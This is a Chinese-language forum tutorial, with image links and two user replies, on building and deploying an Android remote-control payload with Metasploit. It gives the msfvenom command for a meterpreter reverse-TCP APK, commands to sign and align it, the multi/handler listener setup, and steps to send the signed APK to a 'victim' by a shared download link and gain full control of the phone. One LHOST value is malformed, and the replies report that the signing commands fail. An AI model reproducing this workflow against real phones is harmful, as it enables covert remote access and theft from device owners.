如何使用Metasploit对安卓手机进行控制
我们需要两台虚拟机:Kali Linux和安卓模拟器。http://image.3001.net/images/20160515/14633219943221.png!small 打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。http://image.3001.net/images/20160516/14633908842126.png!smallMsfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。```msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk```p 设置要使用的payloadLHOST 设置用来接收反弹连接的主机LPORT 设置用来接收反弹连接的端口R 设置文件格式Location 要保存的文件位置这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。http://image.3001.net/images/20160515/14633225352222.png!small 我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。我们可以使用如下工具进行手动签名:l Keytool (已安装)l jar signer (已安装)l zipalign (需要安装)执行下列命令签名。首先使用密钥工具创建密钥库。keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`http://image.3001.net/images/20160515/14633220737110.png!small 然后使用JARsigner签名APKjarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名jarsigner -verify -verbose -certs APPNAME.apk
`http://image.3001.net/images/20160515/14633221202034.png!small Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
http://image.3001.net/images/20160515/14633222572062.png!small 现在我们有了一个带有签名的APK,它可以安装在任何设备上。http://image.3001.net/images/20160515/14633222724536.png!small 使用Metasploit进行测试接下来启动metasploit的监听器。执行msfconsole打开控制台。http://image.3001.net/images/20160515/14633222816623.png!small use exploit/multi/handlerSet PAYLOAD android/meterpreter/reverse_tcpSET LHOST 192.168.152.128SET LPORT 4444Exploithttp://image.3001.net/images/20160515/14633222922997.png!small
http://image.3001.net/images/20160515/14633223185278.png!small
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
http://image.3001.net/images/20160515/14633223757328.png!small
这是我们切换到安卓模拟器。
1、从https://code.google.com/archive/p/android-x86/downloads下载android x86的iso。2、使用vmware创建一个内核版本为2.6的虚拟机。3、挂载镜像,启动虚拟机。4、进入Live模式。5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。
http://image.3001.net/images/20160515/14633224221569.png!small
另外要允许安卓安装来历不明的apk。
http://image.3001.net/images/20160515/14633224396596.png!smallhttp://image.3001.net/images/20160515/14633224462922.png!small
切换回Kali,我们发现创建了一个新的会话。
http://image.3001.net/images/20160515/14633224588803.png!small
然后你就可以为所欲为的操作这台“手机”了。
http://image.3001.net/images/20160515/14633224655473.png!small
签名的时候报错,参考别的教程通过(也许本文命令有问题)
签名的时候报错,参考别的教程通过(也许本文命令有问题)
页:
[1]